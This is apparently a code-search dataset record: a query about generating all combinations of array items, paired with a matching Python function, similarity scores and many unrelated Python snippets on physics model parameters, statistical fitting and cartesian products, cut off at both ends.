k1L1, gammaH, g2V_20)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T20_Neg(\\\"-1*((pow(@2,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_20)\") \n self.modelBuilder.doVar(\"expr::g2V_21(\\\"\"+str(self.g2V[20])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T21(\\\"((pow(@2,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_21)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T21_Neg(\\\"-1*((pow(@2,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_21)\") \n self.modelBuilder.doVar(\"expr::g2V_22(\\\"\"+str(self.g2V[21])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T22(\\\"((@2*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_22)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T22_Neg(\\\"-1*((@2*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_22)\") \n self.modelBuilder.doVar(\"expr::g2V_23(\\\"\"+str(self.g2V[22])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T23(\\\"((@0*@1*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_23)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T23_Neg(\\\"-1*((@0*@1*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_23)\") \n self.modelBuilder.doVar(\"expr::g2V_24(\\\"\"+str(self.g2V[23])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T24(\\\"((@0*pow(@1,2)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_24)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T24_Neg(\\\"-1*((@0*pow(@1,2)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_24)\") \n self.modelBuilder.doVar(\"expr::g2V_25(\\\"\"+str(self.g2V[24])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T25(\\\"((pow(@0,2)*@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_25)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T25_Neg(\\\"-1*((pow(@0,2)*@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_25)\") \n self.modelBuilder.doVar(\"expr::g2V_26(\\\"\"+str(self.g2V[25])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T26(\\\"((@0*@1*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_26)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T26_Neg(\\\"-1*((@0*@1*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_26)\") \n self.modelBuilder.doVar(\"expr::g2V_27(\\\"\"+str(self.g2V[26])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T27(\\\"((@0*pow(@1,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_27)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T27_Neg(\\\"-1*((@0*pow(@1,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_27)\") \n self.modelBuilder.doVar(\"expr::g2V_28(\\\"\"+str(self.g2V[27])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T28(\\\"((pow(@0,2)*@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_28)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T28_Neg(\\\"-1*((pow(@0,2)*@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_28)\") \n self.modelBuilder.doVar(\"expr::g2V_29(\\\"\"+str(self.g2V[28])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T29(\\\"((@0*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_29)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T29_Neg(\\\"-1*((@0*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_29)\") \n self.modelBuilder.doVar(\"expr::g2V_30(\\\"\"+str(self.g2V[29])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T30(\\\"((@0*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_30)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T30_Neg(\\\"-1*((@0*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_30)\") \n self.modelBuilder.doVar(\"expr::g2V_31(\\\"\"+str(self.g2V[30])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T31(\\\"((pow(@0,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_31)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T31_Neg(\\\"-1*((pow(@0,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_31)\") \n self.modelBuilder.doVar(\"expr::g2V_32(\\\"\"+str(self.g2V[31])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T32(\\\"((@1*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_32)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T32_Neg(\\\"-1*((@1*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_32)\") \n self.modelBuilder.doVar(\"expr::g2V_33(\\\"\"+str(self.g2V[32])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T33(\\\"((@1*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_33)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T33_Neg(\\\"-1*((@1*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_33)\") \n self.modelBuilder.doVar(\"expr::g2V_34(\\\"\"+str(self.g2V[33])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T34(\\\"((pow(@1,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_34)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T34_Neg(\\\"-1*((pow(@1,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_34)\") \n self.modelBuilder.doVar(\"expr::g2V_35(\\\"\"+str(self.g2V[34])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T35(\\\"((@0*@1*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_35)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T35_Neg(\\\"-1*((@0*@1*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_35)\") \n \n self.modelBuilder.doVar(\"expr::g1V_1(\\\"\"+str(self.g1V[0])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T1(\\\"((pow(@0,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_1)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T1_Neg(\\\"-1*((pow(@0,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_1)\") \n self.modelBuilder.doVar(\"expr::g1V_2(\\\"\"+str(self.g1V[1])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T2(\\\"((@0*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_2)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T2_Neg(\\\"-1*((@0*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_2)\") \n self.modelBuilder.doVar(\"expr::g1V_3(\\\"\"+str(self.g1V[2])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T3(\\\"((pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_3)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T3_Neg(\\\"-1*((pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_3)\") \n self.modelBuilder.doVar(\"expr::g1V_4(\\\"\"+str(self.g1V[3])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T4(\\\"((@0*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_4)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T4_Neg(\\\"-1*((@0*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_4)\") \n self.modelBuilder.doVar(\"expr::g1V_5(\\\"\"+str(self.g1V[4])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T5(\\\"((pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_5)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T5_Neg(\\\"-1*((pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_5)\") \n self.modelBuilder.doVar(\"expr::g1V_6(\\\"\"+str(self.g1V[5])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T6(\\\"((@0*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_6)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T6_Neg(\\\"-1*((@0*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_6)\") \n self.modelBuilder.doVar(\"expr::g1V_7(\\\"\"+str(self.g1V[6])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T7(\\\"((pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_7)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T7_Neg(\\\"-1*((pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_7)\") \n self.modelBuilder.doVar(\"expr::g1V_8(\\\"\"+str(self.g1V[7])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T8(\\\"((@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_8)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T8_Neg(\\\"-1*((@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_8)\") \n self.modelBuilder.doVar(\"expr::g1V_9(\\\"\"+str(self.g1V[8])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T9(\\\"((@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_9)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T9_Neg(\\\"-1*((@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_9)\") \n self.modelBuilder.doVar(\"expr::g1V_10(\\\"\"+str(self.g1V[9])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T10(\\\"((@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_10)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T10_Neg(\\\"-1*((@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_10)\") \n \n self.modelBuilder.doSet(\"POI\",poi)", "def sample_parameters_prior(self, n_samples, random_seed=None):\n\n if random_seed is not None:\n np.random.seed(random_seed)\n samples = []\n samples.append(self.var_noise.sample_from_prior(n_samples))\n samples.append(self.mean.sample_from_prior(n_samples))\n samples.append(self.kernel.sample_parameters(n_samples))\n\n return np.concatenate(samples, 1)", "def get_prev_samples(self):\n return self.y_p", "def get_param_sample_weight(self, name):\n if name == 'negbin_r_0':\n weights = np.asarray(self.model.p_outlier_total[:, 0])\n elif name == 'negbin_r_1':\n weights = np.asarray(self.model.p_outlier_total[:, 1])\n elif name == 'betabin_M_0':\n weights = np.asarray(self.model.p_outlier_allele[:, 0])\n elif name == 'betabin_M_1':\n weights = np.asarray(self.model.p_outlier_allele[:, 1])\n elif name == 'negbin_hdel_mu':\n weights = self._get_hdel_weights()\n elif name == 'negbin_hdel_r_0':\n weights = self._get_hdel_weights() * np.asarray(self.model.p_outlier_total[:, 0])\n elif name == 'negbin_hdel_r_1':\n weights = self._get_hdel_weights() * np.asarray(self.model.p_outlier_total[:, 1])\n elif name == 'betabin_loh_p':\n weights = self._get_loh_weights()\n elif name == 'betabin_loh_M_0':\n weights = self._get_loh_weights() * np.asarray(self.model.p_outlier_allele[:, 0])\n elif name == 'betabin_loh_M_1':\n weights = self._get_loh_weights() * np.asarray(self.model.p_outlier_allele[:, 1])\n norm = weights.sum()\n if norm > 0.:\n return weights / norm\n else:\n print ('nothing for ' + name)\n return None", "def source_individual_params(targ_ind):\n # # Note - Table S6 lists beta1, beta2, pi1, pi2 rather than beta_T, beta_S, pi_T, pi_S.\n # # This seems to be a typo since I can reproduce their curves.\n # all_params = [[21.45e-6, 0.86, 3.68, 0.17e-7, 2.2, 10.89, 14.7, 8.21, 0.06, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [1.31e-6, 1.82, 15.53, 0.8e-7, 2.18, 2.46, 15, 8.44, 0.18, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [13.35e-6, 1.16, 11.61, 2.63e-7, 4.17, 1.67, 6.5, 7.92, 0, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [2.4e-6, 3.55, 11.53, 1.35e-7, 1.6, 1.7, 15.7, 10.99, 2.4, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [1.41e-6, 1.42, 12.47, 1.06e-7, 2.17, 1.08, 22, 8.21, 0, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [6.94e-6, 0.76, 5.89, 0.17e-7, 3.33, 10.34, 17.3, 8.79, 0.15, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [18.21e-6, 0.38, 8.74, 9.19e-7, 0.41, 0.15, 17.85, 9, 0.22, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [5.12e-6, 3.53, 4.5, 4.9e-7, 2.04, 1.64, 8.3, 6.89, 1.89, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [1.53e-6, 4.06, 9.65, 0.29e-7, 3.96, 8.15, 17.11, 9.47, 0.66, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # ]\n\n # I've modified it so that I10 is instead VT0, the initial (swabbable) virions from the URT.\n all_params = [[21.45e-6, 0.86, 3.68, 0.17e-7, 2.2, 10.89, 14.7, 8.21, 0.06, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [1.31e-6, 1.82, 15.53, 0.8e-7, 2.18, 2.46, 15, 8.44, 0.18, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [13.35e-6, 1.16, 11.61, 2.63e-7, 4.17, 1.67, 6.5, 7.92, 0, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [2.4e-6, 3.55, 11.53, 1.35e-7, 1.6, 1.7, 15.7, 10.99, 2.4, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [1.41e-6, 1.42, 12.47, 1.06e-7, 2.17, 1.08, 22, 8.21, 0, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [6.94e-6, 0.76, 5.89, 0.17e-7, 3.33, 10.34, 17.3, 8.79, 0.15, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [18.21e-6, 0.38, 8.74, 9.19e-7, 0.41, 0.15, 17.85, 9, 0.22, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [5.12e-6, 3.53, 4.5, 4.9e-7, 2.04, 1.64, 8.3, 6.89, 1.89, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [1.53e-6, 4.06, 9.65, 0.29e-7, 3.96, 8.15, 17.11, 9.47, 0.66, 4e6, 4.8e8, 1, 10, 4, 0.001],\n ]\n currparam = all_params[targ_ind]\n return currparam", "def _param(self) ->nn.Parameter:\n return next(self.parameters())", "def get_trial_param(self, trial_id: int, param_name: str) -> float:\n raise NotImplementedError", "def _get_R(self, net_r_amp):\n return np.abs(net_r_amp)**2", "def GetParameters_and_Weight_of_CalSensor(ind, similar_sensors): \n v, a, h = similar_sensors.loc[ind]['Vert_Shift'], similar_sensors.loc[ind]['Amplitude'], similar_sensors.loc[ind]['Horiz_Shift']\n por, res, drain = similar_sensors.loc[ind]['Porosity'], similar_sensors.loc[ind]['Res_SM'], similar_sensors.loc[ind]['Drainage']\n n, w = similar_sensors.loc[ind]['n'], similar_sensors.loc[ind]['Weight']\n return v,a,h,por,res,drain,n,w", "def get_initial_params(self, x, y, yerr):\n ampl = y[0]\n offset = 0\n tau = log(y[-1] / float(y[0])) / (x[-1] - x[0])\n if self.amplitude != None:\n p0 = array([tau])\n else:\n if self.offset:\n p0 = array([tau, ampl, offset])\n else:\n p0 = array([tau, ampl])\n return p0", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Afb[0.6,-0.75,0.75]\");\n self.modelBuilder.doSet(\"POI\",\"Afb\")\n\n # ss templates\n self.modelBuilder.doVar(\"Dilu_ratio[1.0,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rdy_mumu_ss[1.0,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rdy_ee_ss[1.0,0.0,10.0]\");\n \n self.modelBuilder.factory_('expr::Rpl(\"0.5*(1.+@0*@1)\",Afb, Dilu_ratio)')\n self.modelBuilder.factory_('expr::Rmn(\"0.5*(1.-@0*@1)\",Afb, Dilu_ratio)')", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def getOptimalParams(self):\n\t\t# Load calibration chain and find optimal for like1\n\t\tcal_data = pd.read_csv(self.database_path, sep=',')\n\t\tparams = cal_data.ix[cal_data['like1'].idxmax()].to_dict()\n\t\tcost = params['like1']\n\t\t# reformat parameters to match original naming\n\t\tparams_reformatted = {}\n\t\tfor k, p in self.cal_params.items():\n\t\t\tparams_reformatted[k] = params['par'+k]\n\n\t\treturn params_reformatted, cost", "def _get_params(self):\r\n return np.hstack((self.variance, self.lengthscale))", "def _get_params(self):\r\n return np.hstack((self.variance, self.lengthscale))", "def enforce(self, wave, variables, parameters):\n return np.hstack([variables[0] - self.level])", "def getExtrinsicParameter(K, R, C):\n t = np.dot(-R, C)\n homogeneous_matrix = np.hstack((R.reshape(3, 3), t))\n extrinsic_parameter = np.dot(K, homogeneous_matrix)\n return extrinsic_parameter", "def _get_params(self):\r\n return np.hstack((self.variance,self.lengthscale))", "def scale_parameter(self):\n return self._scale_parameter", "def parameters(self):\n #print \"in instrument.parameter()\"\n return self._params", "def get_explanatory_variable(self):\n\n return self._explanatory_variables[0]", "def sample_rate(self):\n\n properties_file = open(self.scenario_path + \"/conf/sandag_abm.properties\", \"r\")\n rate = None\n\n for line in properties_file:\n # strip all white space from the line\n line = line.replace(\" \", \"\")\n\n # find line containing \"sample_rates=\"\n m = re.compile(\"sample_rates=\").match(line)\n if m:\n # take the portion of the line after the matching string\n # and split by the comma character\n line = line[m.end():].split(\",\")\n\n # if the split line contains a single element return that element\n # otherwise return the final element\n if len(line) == 0:\n rate = float(line[0])\n else:\n rate = float(line[-1])\n break\n\n properties_file.close()\n\n return rate", "def __adjust(self, *args):\n return \"adjust\"", "def derive_sample_params(self, global_state):\n return global_state.l2_norm_clip", "def getParameter(self, *args):\n return _libsbml.Model_getParameter(self, *args)", "def get_scale_parameter(self):\r\n \r\n if self.scale_parameter == 0.0: \r\n shape_in_gamma_func = float(1+(1/self.shape_parameter))\r\n gamma_func = special.gamma(shape_in_gamma_func)\r\n self.scale_parameter = (self.mean_fire_recurrence/gamma_func)\r\n return self.scale_parameter\r\n else:\r\n return self.scale_parameter", "def rate_parameters(self):\n rate_parameters = deepcopy(self.__likelihood.rate_parameters)\n for k in self.__likelihood.rate_parameters.keys():\n if k+\"_rate_multiplier\" in self.conv_config.keys():\n rate_parameters.pop(k)\n\n return rate_parameters", "def adjustment(self, uuid):\r\n return ads.Adjustment(self, uuid)", "def IMPORTANCE(attribute_name, examples, attribues):\n p = 0\n n = 0\n # First count the number of p and n \n for item in examples:\n if item[-1] == 'Yes':\n p += 1\n else:\n n += 1\n Gain = B(p/(p+n)) - REMAINDER(attribute_name, examples, attribues)\n return Gain" ]
[ "0.5970573", "0.5970573", "0.5970573", "0.5970573", "0.5970573", "0.5970573", "0.5970573", "0.5970573", "0.55451614", "0.5458691", "0.5382217", "0.5338391", "0.52984136", "0.52497977", "0.5241062", "0.5241062", "0.52158433", "0.5213984", "0.5213984", "0.5159911", "0.5122732", "0.5122732", "0.5092428", "0.5075391", "0.5052946", "0.50310373", "0.5022099", "0.4997139", "0.4979453", "0.49286848", "0.4923194", "0.4917466", "0.4879428", "0.48773882", "0.4877344", "0.48759872", "0.4860874", "0.48564583", "0.4838914", "0.48351783", "0.47919795", "0.47909272", "0.4782862", "0.47802216", "0.4779709", "0.47787923", "0.47779015", "0.4774232", "0.47591195", "0.47587603", "0.47474337", "0.47222978", "0.470817", "0.4703813", "0.4703429", "0.47000802", "0.4696898", "0.46930638", "0.46913144", "0.46908298", "0.4670111", "0.4657506", "0.46547753", "0.46523997", "0.4650519", "0.46489963", "0.46489963", "0.46489963", "0.46449575", "0.46387222", "0.46289894", "0.46279934", "0.46220833", "0.46219155", "0.4619741", "0.46180573", "0.46116686", "0.46084893", "0.46021453", "0.46018842", "0.4596365", "0.4590685", "0.4590685", "0.4590685", "0.45902565", "0.45868343", "0.45868343", "0.45809925", "0.45785442", "0.457706", "0.45687914", "0.45668912", "0.456689", "0.45603427", "0.45539755", "0.45503983", "0.4549359", "0.45452315", "0.45392174", "0.4537734", "0.45306924" ]
0.0
-1
Get all combinations of items in the given array Specifically used for generating variant combination
def get_all_comb(array, r=None): if r is None: r = len(array) return [_ for i in range(1, r + 1) for _ in itertools.combinations(array, i)]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def combinations(arrays):\n return np.array(np.meshgrid(*arrays)).T.reshape(-1, len(arrays))", "def combos(array,n=2): \n # base case\n if n==0:\n yield frozenset()\n return\n\n # core recursion\n for c in set(combos(array,n-1)):\n for i in array:\n #added this to avoid duplicate combos\n if i not in c:\n # add element i to combo c\n yield frozenset({i})| c", "def AllCombinations(data, comblength):\n return [c for c in itertools.combinations(data, comblength)]", "def subsets(arr):\n return chain(*[combinations(arr, i + 1) for i, a in enumerate(arr)])", "def subsets(arr):\n return chain(*[combinations(arr, i + 1) for i, a in enumerate(arr)])", "def get_combinations(self):\n all_steps = self.do_steps()\n self.option = [k for k, v in all_steps.items()]\n result = itertools.product(*(v for k, v in all_steps.items()))\n return result", "def __get_all_combinations(self, list_of_items):\r\n return [itertools.combinations(list_of_items, index+1)\r\n for index in range(len(list_of_items))]", "def combinations(*comb, **kw):\n return _fixture_functions.combinations(*comb, **kw)", "def cartesian_product(arrays):\n la = len(arrays)\n dtype = np.find_common_type([a.dtype for a in arrays], [])\n arr = np.empty([len(a) for a in arrays] + [la], dtype=dtype)\n for i, a in enumerate(np.ix_(*arrays)):\n arr[..., i] = a\n return arr.reshape(-1, la)", "def generate_option_combos(self):\n available_options = list()\n for option in self.options:\n # generate a list of dicts for every value of the option\n tmp = list()\n for value in option.values:\n tmp.append({option.name: value})\n\n available_options.append(tmp)\n\n # generate a list of tuples for each product option combination\n option_combos = list(itertools.product(*available_options))\n\n return option_combos", "def cartesian_product(*arrays):\n\n la = len(arrays)\n if la == 0:\n return np.array([])\n dtype = np.result_type(*arrays)\n arr = np.empty([len(a) for a in arrays] + [la], dtype=dtype)\n for i, a in enumerate(np.ix_(*arrays)):\n arr[..., i] = a\n return arr.reshape(-1, la)", "def combinations(*args: List[Any]) -> List[List]:\n return list([list(el) for el in list(product(*args))])", "def combinations(self):\n return self._combinations", "def cartesian_product(*arrays):\n length = len(arrays)\n dtype = np.result_type(*arrays)\n arr = np.empty([len(a) for a in arrays] + [length], dtype=dtype)\n for idx, array in enumerate(np.ix_(*arrays)):\n arr[...,idx] = array\n return arr.reshape(-1, length)", "def make_combinations(items):\n\n def inner(items, r):\n \"\"\"\n recursively yields partitioned remainders of original partition lists\n \"\"\"\n items = set(items)\n if not len(items):\n yield ()\n return\n first = next(iter(items))\n remainder = items.difference((first, ))\n for combination in combinations(remainder, r-1):\n first_subset = (first, ) + combination\n for partition in inner(remainder.difference(combination), r):\n yield (first_subset, ) + partition\n\n def outter(items, r):\n \"\"\"\n combines partition lists\n \"\"\"\n items = set(items)\n for i in range(len(items), -1, -r):\n if i == 0:\n for partition in inner(items, r):\n yield partition\n elif i != r:\n for combination in combinations(items, i):\n for partition in inner(items.difference(combination), r):\n yield partition + (combination, )\n\n # step through length of origin combination partitions to ensure full list\n for i in range(1, len(items)):\n gen = outter(items, i)\n for row in gen:\n yield row", "def equipment_combinations(weapons, armor, rings):\n weapon_choices = item_combinations(weapons, range(1, 2))\n armor_choices = item_combinations(armor, range(2))\n ring_choices = item_combinations(rings, range(3))\n complete_choices = itertools.product(weapon_choices, armor_choices, ring_choices)\n return complete_choices", "def _combinations(n_features, n_args, interaction_only):\n comb = combinations if interaction_only else combinations_w_r\n return comb(range(n_features), n_args)", "def cartesian(arrays, out=None):\n\n arrays = [np.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = np.prod([x.size for x in arrays])\n if out is None:\n out = np.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:, 0] = np.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m, 1:])\n for j in range(1, arrays[0].size):\n out[j*m:(j+1)*m, 1:] = out[0:m, 1:]\n return out", "def _generate_combinations(self, param_idx, params):\n\n if param_idx == len(self.grid) - 1:\n # last parameter, just return list of values for this parameter\n return [[value] for value in self.grid[params[param_idx]]]\n else:\n subcombinations = self._generate_combinations(param_idx + 1, params) # returns list of param combinations\n result = []\n\n # iterate over all values of current parameter\n for value in self.grid[params[param_idx]]:\n for subcombination in subcombinations:\n result.append([value] + subcombination)\n\n return result", "def cartesian(arrays, out=None):\n\n arrays = [np.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = np.prod([x.size for x in arrays])\n if out is None:\n out = np.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:, 0] = np.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m, 1:])\n for j in range(1, arrays[0].size):\n out[j * m:(j + 1) * m, 1:] = out[0:m, 1:]\n return out", "def cartesian(arrays, out=None):\n\n arrays = [np.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = np.prod([x.size for x in arrays])\n if out is None:\n out = np.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:,0] = np.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m,1:])\n for j in xrange(1, arrays[0].size):\n out[j*m:(j+1)*m,1:] = out[0:m,1:]\n return out", "def cartesian(arrays, out=None):\n\n arrays = [np.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = np.prod([x.size for x in arrays])\n if out is None:\n out = np.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:,0] = np.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m,1:])\n for j in xrange(1, arrays[0].size):\n out[j*m:(j+1)*m,1:] = out[0:m,1:]\n return out", "def genSubset2(L):\n import itertools\n result = []\n for i in range(len(L) + 1):\n result += list(itertools.combinations(L, i))\n return result", "def cartesian(arrays, out=None):\n\n arrays = [numpy.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = numpy.prod([x.size for x in arrays])\n if out is None:\n out = numpy.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:, 0] = numpy.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m, 1:])\n for j in xrange(1, arrays[0].size):\n out[j * m:(j + 1) * m, 1:] = out[0:m, 1:]\n return out", "def compute_combinations(items: List[Union[List[Any], Tuple]], n: int) -> List[List[Any]]:\n return [chunks[i:i + n] for chunks in items for i in range(len(chunks) - (n - 1))]", "def cartesian(arrays, out=None):\n\n arrays = [numpy.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = numpy.prod([x.size for x in arrays])\n if out is None:\n out = numpy.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:,0] = numpy.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m,1:])\n for j in xrange(1, arrays[0].size):\n out[j*m:(j+1)*m,1:] = out[0:m,1:]\n return out", "def subset_gen(itemSet):\n subsets = []\n for i in range(1, len(itemSet)):\n c = combinations(itemSet, r=i)\n for cc in c:\n subsets.append(set(cc))\n return subsets", "def generate_item_combinations(\n weapons, armors, rings\n) -> Iterator[Tuple[Item, Item, Item, Item]]:\n\n for weapon in weapons:\n for armor in armors:\n for ring_one, ring_two in combinations(rings, 2):\n yield weapon, armor, ring_one, ring_two", "def permutations(xs):\n if not xs:\n yield []\n else:\n for x, xs in selections(xs):\n for ys in 